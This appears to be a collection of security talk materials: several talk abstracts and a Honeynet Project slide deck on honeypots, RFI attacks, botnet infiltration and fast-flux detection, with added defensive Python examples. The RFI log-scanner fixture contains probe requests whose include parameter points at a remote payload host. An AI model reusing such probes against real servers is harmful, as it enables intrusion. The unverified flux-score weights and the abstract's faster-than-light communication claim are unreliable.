New immune system of information security from CHINA by WooYun - CODE BLUE 2015
This talk is an introduction to WooYun.
WooYun is a platform where security researchers report vulnerabilities and vendors give feedback. While WooYun tracks vulnerabilities, it also gives researchers a platform for public-interest work, study, communication, and research. In my presentation I will introduce how WooYun works and why we started this project, what WooYun has changed in the security circle in China, why, when and where it was built, how it developed, and the difficulties encountered along the way.
As the saying goes: know yourself and know your enemy, and you will win every battle!
For this event we have invited Allen to share the hacker attack techniques commonly seen recently, such as taking servers down, stealing personal data and financial fraud. Knowing how these attacks work should leave NPOs much better placed to respond in the future; everyone is welcome to attend.
Slide source:
Information Security that NPOs Need to Know, Allen Own
https://speakerdeck.com/allenown/npo-yao-zhi-dao-de-zi-xun-an-quan
Quantum Entanglement - Cryptography and Communication, Yi-Hsueh Tsai
1. Introduction 2. Quantum Entanglement 3. Quantum Cryptography - Quantum Key Distribution 4. Physical Limit for E2E Time Delay - Speed of Light 5. Shorten E2E Delay - Faster-Than-Light Communication 6. Conclusions
1. To improve communication security, quantum cryptography could be considered. 2. To shorten E2E delay, technology regarding Faster-Than-Light (FTL) communication is required.
Network security is a special research field. One reason is that in network security problems the "opponent" is not text, images or any other kind of static data, but living people: the black hat hackers who cause these problems spend their days searching for system and network vulnerabilities, trying to devise cleverer attack methods to obtain every possible gain. In network security research we therefore cannot "presuppose" how hackers will attack; we must look for clues in real data, and discover and resolve, from large volumes of data, the behaviours that have occurred or will occur that may endanger the security and privacy of users' data. In this talk I will introduce data-driven network security research and use several actual research cases to show what kinds of security problems statistical analysis of real data can help us solve.
Slide 24
This is the reality…
- Hacking is easy and cheap
- You will be a victim anytime and anywhere
- Hackers love your information, computer, network and your money
- The hacking market is very mature
Slide 37
The Honeynet Project
- The Honeynet Project is an organization dedicated to answering these questions. It studies the bad guys and shares the lessons learned.
  - What specific threats do computer networks face from hackers?
  - Who's perpetrating these threats and how?
- The group gathers information by deploying networks (called honeynets) that are designed to be compromised.
Slide 38
The Honeynet Project
- The Honeynet Project is a non-profit research organization improving the security of the Internet at no cost to the public by providing tools and information on cyber security threats.
Slide 39
Mission Statement:
To learn the tools, tactics, and motives of the blackhat community, and share the lessons learned.
- Goals:
  - Awareness: to raise awareness of the threats that exist.
  - Information: to make aware, teach and inform about the threats.
  - Research: to give organizations the capabilities to learn more on their own.
Slide 41
The Honeynet Project History
[Timeline figure, 1999 to 2009, with the following milestones]
- Members organized in the Wargames mailing list
- Lance Spitzner officially becomes the Honeynet Project
- Research Alliance organized
- Annual Workshop mechanism launched
- Funded
- Google Code Project
- High-Interaction Honeywall CDROM ROO officially released
- Client Honeypot technology development
- Virtual Honeypot concepts and technology development
- To date, chapters established in 41 countries
- GDH Project: global distributed honeynet deployment
- Maximum use of limited resources
- High-interaction honeynets capture new attack techniques
- Web-site attacks rampant
- Global honeynet established
- Sharing each country's security development status
Slide 42
Honeynet Project Organization
Characteristics:
- Non-profit (501(c)(3)) organization
- Trusted relationship among full members
- Works virtually around the world
Slide 43
Activities
- KYE (Know Your Enemy) Papers
- Forensics Challenge
- Open Source Tools Development
- Global Distributed Honeynet (GDH II)
- Google Summer of Code (GSoC) Project
- Annual Closed Workshop
Slide 44
Annual Workshop
- 2009 Annual Workshop:
  - Held 25 to 28 February 2009 in Kuala Lumpur, Malaysia
  - 70 participants worldwide (closed meeting)
- Discussed at the meeting:
  - 15 countries presented their current research and development status and how their organizations operate
  - Key R&D plans set, with cross-national cooperation
  - Technical exchange, sharing of experience and research
  - Chapter members meet each other and build trusted relationships
  - Hands-on training courses
[Map figure marked "We are here!", with 2007 and 2009 panels]
Slide 52
[Attack-flow diagram; the recovered labels follow]
1. Using website weaknesses and RFI attack techniques, site A becomes the hacker's host/proxy, and the hacker can control bots through A (compromised web server A).
Web drive-by: malicious code is planted into the page, which acts as the reporting site.
- Users who browse the page download the malware and are infected
- Report IP, email, user account, operating system, CPU and MSN details (over Web or SMTP)
- Download more malware
- Send forged mail containing phishing links
- Leak private data
Malicious Web + RFI + Fast-Flux + Phishing = a complete money-flow system for the hacker community
2. Register a domain name (3322.org) and set up a malware file server
Diagram nodes: SMTP servers; Malicious Web Sites B1, B2, B3; Phishing Web Sites C1, C2 (all under 3322.org)
Slide 59
Thinking … the origin of the honeynet / honeypot design
- A lot of information is available to us:
  - Firewall, IPS, Nagios, system logs, …
  - Authorized access, unauthorized connections, unusual connections, abnormal behaviors, …
- However, what is the critical information for network administrators?
- The problem: finding a needle in a haystack
- A good solution: Honeypot / Honeynet
Slide 60
Introduction to honeypots
- General purpose:
  - Designed operating systems, services or vulnerabilities placed around your networks to be probed and hacked
  - All data collected is of high value and unpolluted
- What is a honeypot? (single point)
  - A honeypot is a system designed to be running but to have no production value; it is used as a target for attackers in order to learn their activity and behaviour and to collect information about network threats
  - Mode of operation: it emulates specific services and operating systems, and monitors and captures inbound and outbound data for research and analysis
Slide 70
Remote File Inclusion explained (cont.)
- Remote File Inclusion (RFI) is not a new kind of attack, but with the spread of botnets it has become a mainstream one.
- Hackers / zombie computers try to find web applications and web servers with RFI weaknesses, make the victim web server execute remotely hosted code, and through that code compromise the victim machine and take control of it.
[Diagram: A: RFI attack site, B: target site]
Step 1: Try to inject (Testing Code A) into the target web page
Step 2: If the injection works, hackers can inject (Executable Code A) to control host B
Step 3: Exploit this host and get root access
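As an added example (not code from the slides), the following Python checks web-server access logs for the Step 1 probe described above: a request whose include parameter carries a remote URL, which is what a web-application honeypot such as HIHAT records. The log lines are constructed, and the function and field names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access-log lines (not real traffic): one normal request,
# then two RFI probes whose include parameter carries a remote URL, as in Step 1 above.
SAMPLE_LOG = """\
203.0.113.5 - - [05/May/2010:10:00:01 +0800] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.9 - - [05/May/2010:10:00:07 +0800] "GET /index.php?page=http://198.51.100.7/id.txt? HTTP/1.1" 200 88
203.0.113.9 - - [05/May/2010:10:00:09 +0800] "GET /gallery.php?inc=ftp://198.51.100.7/c.txt HTTP/1.1" 500 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself an absolute URL is the RFI signature: the application
# is being asked to fetch and run code hosted on another machine.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def rfi_candidates(log_text):
    """Return one record per request parameter whose value points at a remote file."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log entry
        target = urlsplit(m.group("target"))
        for param, value in parse_qsl(target.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                remote = urlsplit(value)
                hits.append({
                    "src": m.group("src"),            # client sending the probe
                    "path": target.path,              # script being probed
                    "param": param,                   # include parameter under test
                    "remote_host": remote.hostname,   # host serving the include payload
                    "scheme": remote.scheme.lower(),
                    "status": int(m.group("status")),
                })
    return hits

def hosting_summary(hits):
    """Count probes per payload-hosting host, for blocking and abuse reporting."""
    counts = {}
    for h in hits:
        counts[h["remote_host"]] = counts.get(h["remote_host"], 0) + 1
    return counts
```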
Slide 79
Introduction to honeynets
- The problems to solve:
  - How can we collect more information and defend against the enemy, when we don't even know who the enemy is?
  - How can we collect a hacker's whole chain of attack behaviour without it being noticed that someone is watching?
- A honeypot is a single data-collection point and the data it can collect is very limited; how can we see comprehensive and complete attack information?
- A honeynet is a complete real network, opened mainly for hackers to attack, through which we can learn hackers' attack behaviour
- By building a Honeynet environment, all inbound and outbound traffic can be collected and monitored
Slide 83
Honeynet schematic diagram
[Diagram: a router connects production Host 1 … Host N and Server 1 … Server N; the HoneyWall, with interfaces eth0, eth1 and eth2, sits in front of the HoneyNet containing Honey Host 1 … Honey Host N; a Management Host attaches to the HoneyWall]
Slide 84
Honeywall CDROM ROO architecture
- Data capture mechanisms: firewall log, Snort, Sebek
[Diagram: INTERNET → Honeywall → Honeynet; the Honeywall is labelled "no restrictions" on one side and "connection limiting, filtering of attack packets" on the other; the Honeynet contains a Sendmail mail server, an Oracle database server, a DNS server, an MS-SQL database server and an Apache web server]
Slide 96
Honeynet tool classification:
Analysis tools
- PCAP file: Honeysnap, used for extracting and analyzing data
- DNS: Tracker, used to find domain resolutions and track hostname → IP mappings
- EXE file: Pehunter, grabs Windows executables off the network
- Client-side behavior: Capture-BAT, Win32 operating-system behavior analysis tool
Honeypot tools
- Network connection:
  - Honeymole: set up a honeyfarm with multiple sensors that redirect traffic to a centralized collection of honeypots
  - Honeywall CD ROM: create a network architecture for capturing attacks
  - Honeystick: includes both the Honeywall and honeypots on a single, portable device
  - Honeyd: low-interaction honeypot used for capturing attacker activity
  - Honeytrap: captures novel attacks against network services
- Web application:
  - Google Hack Honeypot
  - HIHAT: transforms a PHP application into a honeypot
- Malware:
  - Nepenthes: emulates known vulnerabilities to download malware
- Client-side:
  - HoneyC: low-interaction client honeypot
  - Capture-HPC: high-interaction client honeypot
Slide 113
Fast-Flux Domain Detection
A hierarchical FF detection method:
Flux-score: Thorsten Holz et al., "Measuring and Detecting Fast-Flux Service Networks," in Proceedings of the 15th Network and Distributed System Security Symposium (NDSS), 2008.
- Phase 1: detect FF domains and CDNs
  - Use the different behavioural conditions of FF to detect FF domains
  - If a domain satisfies more than 4 conditions, it may be an ambiguous domain, which is either FF or a domain using a CDN
- Phase 2: detect the FF domain exactly
  - Use the flux-score to further separate the FF domains from the ambiguous domains
Slide 115
Fast-Flux Domain Detection
- Malicious fluxing domain:
  - The ASNs corresponding to the A records are mostly different
  - The IP addresses differ from each other beyond the B class (/16)
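A worked version of the two-phase method on slides 113 and 115, written for this page as an added example (not code from the slides or from Holz et al.): Phase 1 counts behavioural conditions, the first two being the ones the slides name, and Phase 2 applies the flux-score to the domains Phase 1 leaves ambiguous. The DNS lookups are constructed, and the weights and threshold are the values I recall from Holz et al. 2008, which should be treated as an assumption to verify against the paper.

```python
from ipaddress import ip_network

# Flux-score weights and threshold as I recall them from Holz et al. (NDSS 2008);
# treat these numbers as an assumption and verify them against the paper.
W_A, W_ASN, W_NS, THRESHOLD = 1.32, 18.54, 0.0, 142.38

# Constructed DNS lookups (not real data): two successive queries per domain, each
# giving the TTL, the number of NS records and the (A record, ASN) pairs returned.
# 10.x.y.z addresses are used only to show /16 diversity without naming real hosts.
FLUX = [
    {"ttl": 180, "ns": 2, "answers": [("10.1.7.4", 64501), ("10.2.9.8", 64502), ("10.3.1.1", 64503),
                                       ("10.4.5.6", 64504), ("10.5.2.2", 64505)]},
    {"ttl": 180, "ns": 2, "answers": [("10.6.3.3", 64506), ("10.7.8.8", 64507), ("10.8.4.4", 64508),
                                       ("10.9.6.6", 64509), ("10.10.1.9", 64510)]},
]
CDN = [
    {"ttl": 20, "ns": 4, "answers": [("192.0.2.10", 64500), ("192.0.2.11", 64500), ("192.0.2.12", 64500)]},
    {"ttl": 20, "ns": 4, "answers": [("192.0.2.11", 64500), ("192.0.2.12", 64500), ("192.0.2.13", 64500)]},
]
STATIC = [
    {"ttl": 86400, "ns": 2, "answers": [("198.51.100.5", 64520)]},
    {"ttl": 86400, "ns": 2, "answers": [("198.51.100.5", 64520)]},
]

def features(lookups):
    """Distinct A records, ASNs and /16 prefixes seen across all lookups of one domain."""
    a_records = {ip for lk in lookups for ip, _ in lk["answers"]}
    asns = {asn for lk in lookups for _, asn in lk["answers"]}
    prefixes = {str(ip_network(ip + "/16", strict=False)) for ip in a_records}
    return {"n_a": len(a_records), "n_asn": len(asns), "n_16": len(prefixes), "n_ns": lookups[0]["ns"]}

def phase1_conditions(lookups, f):
    """Behavioural FF conditions; the first two are the ones the slides name."""
    answer_sets = [frozenset(ip for ip, _ in lk["answers"]) for lk in lookups]
    return [
        f["n_asn"] > 1 and f["n_asn"] / f["n_a"] > 0.5,  # A records mostly in different ASNs
        f["n_16"] > 1 and f["n_16"] / f["n_a"] > 0.5,    # addresses spread beyond one B class (/16)
        min(lk["ttl"] for lk in lookups) <= 300,         # assumed: short TTL forces re-resolution
        len(set(answer_sets)) > 1,                       # assumed: answer set rotates between lookups
    ]

def flux_score(f):
    return W_A * f["n_a"] + W_ASN * f["n_asn"] + W_NS * f["n_ns"]

def classify(lookups, min_conditions=2):
    """Phase 1 flags ambiguous (FF or CDN) domains; Phase 2 separates them by flux-score."""
    f = features(lookups)
    if sum(phase1_conditions(lookups, f)) < min_conditions:  # slides: >4 of a larger condition set
        return "benign"
    return "fast-flux" if flux_score(f) > THRESHOLD else "cdn-like"
```

The CDN case passes Phase 1 on TTL and rotation alone but stays under the flux-score threshold because all its addresses share one ASN, which is exactly the separation Phase 2 exists for.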
Slide 116
Inside the botnets: Methodology
1. Collection
- Honeypot technology:
  1. Malware-collection HP
  2. Malicious RFI HP
  3. Malicious Web HP
- Honeypot tools:
  1. Nepenthes
  2. mwcollectd
  3. Glastopf / HIHAT
  4. Capture-HPC
  5. PhoneyC
2. Sample Analysis
- Sample analysis to extract C&C information (IP, nickname, password, channel, command)
- Analysis tools:
  1. CWSandbox / Anubis
  2. VirusTotal
  3. Libemu: shellcode
  4. Pkaii: PHP analyzer
3. Infiltration
- Send the bot to join the C&C server
- Collect commands, traffic and activities inside the C&C
- Monitoring tools:
  1. rishi: bot traffic monitor
  2. infiltrator
  3. Xchat + VMware
Slide 117
Inside the botnets: Methodology (cont.)
4. Feedback
- Collect network pcap files
- Feed information back to the IRC server (command, bot IP, attacked targets)
- Feedback tools:
  1. Scripts written by myself
  2. IRC server
  3. weechat
5. Analysis
- Data analysis using a search-engine tool
- Data visualization for pcap traffic analysis
- Analysis tools:
  1. tshark
  2. chaosreader
  3. Splunk free version
  4. Picviz
6. Reporting
- Share data with trusted organizations
- Ticket system:
  1. OTRS2 (not ready)
Slide 118
1. Collection (cont.)
- Using honeypot technology to collect attack data and malicious samples
- Why do we use honeypots for data collection?
  - Objective: find infected hosts and capture malicious content
  - An infected host with a given vulnerability will probe and attack a honeypot that emulates the same vulnerability
[Diagram: Honeypot]
Slide 138
2. Sample Analysis
[Diagram: samples from the Malware DB pass through Anti-Virus, Behavior Analysis (Sandbox, Real-Testbed) and Static Analysis into Sample Profiling]
Profile:
- Activities on the OS: registry, process, file
- Connections on the network: propagation, remote controller
- Signature generation
Slide 139
2. Sample Analysis:
Binary samples using CWSandbox and Anubis
1. Network activity to get C&C information
2. Set up a virtual lab and execute samples to get C&C information
Slide 146
3. Infiltration Feedback
- Send the bot to join the C&C server
- Collect commands, traffic and activities inside the C&C
[Diagram: binary samples and RFI samples are executed in a virtual-machine pool (Windows XP with Wireshark and xchat for binary samples; PHP for RFI scripts) behind a switch and Snort-Inline; C&C samples are collected and analyzed by Rishi without being executed; the observed C&C servers feed an IRC server data feed]
Slide 147
3. Infiltration (cont.)
- After collecting live C&C servers, start a bot to join the C&C server, then monitor and record the events that occur inside it.
C&C Observation
Slide 153
3. Infected hosts: source-country distribution
4677 attack sources in total, from 36 countries (updated 2010/05/05)
[Pie chart: distribution of attack sources by country]
Country | Attack sources | Share
Taiwan | 1264 | 27%
China | 965 | 21%
United States | 468 | 10%
Russia | 373 | 8%
Japan | 349 | 7%
Germany | 236 | 5%
Malaysia | 227 | 5%
Canada | 132 | 3%
Korea | 119 | 3%
Romania | 110 | 2%
France | 98 | 2%
Others | 336 | 7%
Slide 154
[Table of observed C&C servers: relay host | botnet type (protocol and port) | country]
More than 100 bots in the C&C server
Slide 155
4. Live C&C server statistics:
- 45 live C&C servers (tested on June 30th), three of which each control more than 300 bots
[Pie chart: live C&C servers by country]
Country | Servers | Share
US | 8 | 18%
CN | 7 | 16%
JP | 6 | 13%
RU | 4 | 9%
DE | 4 | 9%
MY | 4 | 9%
CA | 3 | 7%
FR | 2 | 4%
NL | 2 | 4%
Others | 5 | 11%
Slide 156
4. Live C&C server distribution (updated 2010/06/30)
[World map marking live C&C server locations]
Slide 157
5. Real bot connections to C&C servers
- Period: 2010/01/01 ~ 2010/06/30
- Monitored 40~78 C&C servers (HTTP, IRC), with a bot population of at least 60
[Chart: bot connection counts; values shown: 14024, 11095, 26037, 24165]
Slide 158
5. Real bots inside the botnet: country distribution
[Chart: distribution by country; US: 15.69%]
Slide 169
Personal privacy data breach incidents are increasing rapidly
- Data source: http://datalossdb.org/statistics. The Open Security Foundation's DataLossDB gathers information about events involving the loss, theft, or exposure of personally identifiable information (PII).